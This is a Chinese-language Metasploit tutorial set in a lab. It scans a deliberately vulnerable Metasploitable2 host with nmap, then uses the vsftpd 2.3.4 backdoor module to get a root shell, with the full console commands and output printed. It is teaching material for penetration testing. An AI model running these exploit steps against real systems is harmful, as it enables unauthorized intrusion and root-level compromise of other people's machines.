Metasploit实战四之——使用Metasploit中的NMap插件扫描并渗透内网主机（metasploit渗透教程）

Metasploit实战四之——使用Metasploit中的NMap插件扫描并渗透内网主机（metasploit渗透教程）

​

攻击机： Kali 192.168.175.128

靶机： WinXP 192.168.175.130

内网主机： Metasploitable2 192.168.175.131

在上一篇《Metasploit实战三之——使用Metasploit获取目标的控制权限》一文中，我们已经拿下了靶机的控制权限，并通过arp命令得知：内网中有一台IP为192.168.175.131的主机。接下来，我们首先使用NMap对这个主机进行扫描。

1.开启MSF终端

msfconsole

2.扫描内网主机

nmap -sV 192.168.175.131

结果如下：

msf5 > nmap -sV 192.168.175.131[*] exec: nmap -sV 192.168.175.131Starting Nmap 7.70 ( ) at 2019-01-23 12:28 CSTNmap scan report for 192.168.175.131Host is up (0.0029s latency).Not shown: 977 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 2.3.422/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)23/tcp open telnet Linux telnetd25/tcp open smtp Postfix smtpd53/tcp open domain ISC BIND 9.4.280/tcp open Apache 2.2.8 ((Ubuntu) DAV/2)111/tcp open rpcbind 2 (RPC #100000)139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)512/tcp open exec netkit-rsh rexecd513/tcp open login OpenBSD or Solaris rlogind514/tcp open tcpwrapped1099/tcp open rmiregistry GNU Classpath grmiregistry1524/tcp open bindshell Metasploitable root shell2049/tcp open nfs 2-4 (RPC #100003)2121/tcp open ftp ProFTPD 1.3.13306/tcp open mysql MySQL 5.0.51a-3ubuntu55432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.75900/tcp open vnc VNC (protocol 3.3)6000/tcp open X11 (access denied)6667/tcp open irc UnrealIRCd8009/tcp open ajp13 Apache Jserv (Protocol v1.3)8180/tcp open Apache Tomcat/Coyote JSP engine 1.1MAC Address: 00:0C:29:CF:F6:AC (VMware)Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at .Nmap done: 1 IP address (1 host up) scanned in 12.57 seconds

这里，我们利用 vsftpd 2.3.4的漏洞来攻破内网主机。

3.利用利用 vsftpd 2.3.4的漏洞来攻破内网主机

3-1.搜索vsftpd 2.3.4漏洞

这里，使用search vsftpd 2.3.4命令，如下：

msf5 > search vsftpd 2.3.4Matching Modules================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials exploit/multi/ 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution exploit/multi/ 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

3-2.准备攻击

这里，我们依次输入以下命令：

search vsftpd 2.3.4use exploit/unix/ftp/vsftpd_234_backdoor show optionsset RHOSTS 192.168.175.131show payloadsset payload cmd/unix/interact exploit

具体如下：

msf5 > search vsftpd 2.3.4Matching Modules================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials exploit/multi/ 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution exploit/multi/ 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Executionmsf5 > use exploit/unix/ftp/vsftpd_234_backdoor msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show optionsModule options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 21 yes The target port (TCP)Exploit target: Id Name -- ---- 0 Automaticmsf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.175.131RHOSTS => 192.168.175.131msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloadsCompatible Payloads=================== Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- cmd/unix/interact normal No Unix Command, Interact with Established Connectionmsf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact payload => cmd/unix/interactmsf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit[*] 192.168.175.131:21 - Banner: 220 (vsFTPd 2.3.4)[*] 192.168.175.131:21 - USER: 331 Please specify the password.[+] 192.168.175.131:21 - Backdoor service has been spawned, handling...[+] 192.168.175.131:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 1 opened (192.168.175.128:44413 -> 192.168.175.131:6200) at 2019-01-23 14:00:16 +0800ifconfigeth0 Link encap:Ethernet HWaddr 00:0c:29:cf:f6:ac inet addr:192.168.175.131 Bcast:192.168.175.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fecf:f6ac/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:5408 errors:0 dropped:0 overruns:0 frame:0 TX packets:2778 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:368033 (359.4 KB) TX bytes:249606 (243.7 KB) Interrupt:19 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:766 errors:0 dropped:0 overruns:0 frame:0 TX packets:766 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:349561 (341.3 KB) TX bytes:349561 (341.3 KB)

这样，我们就通过NMap扫描目标主机，并通过Metasploit攻击vsftpd 2.3.4漏洞拿下了内网服务器的权限。

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。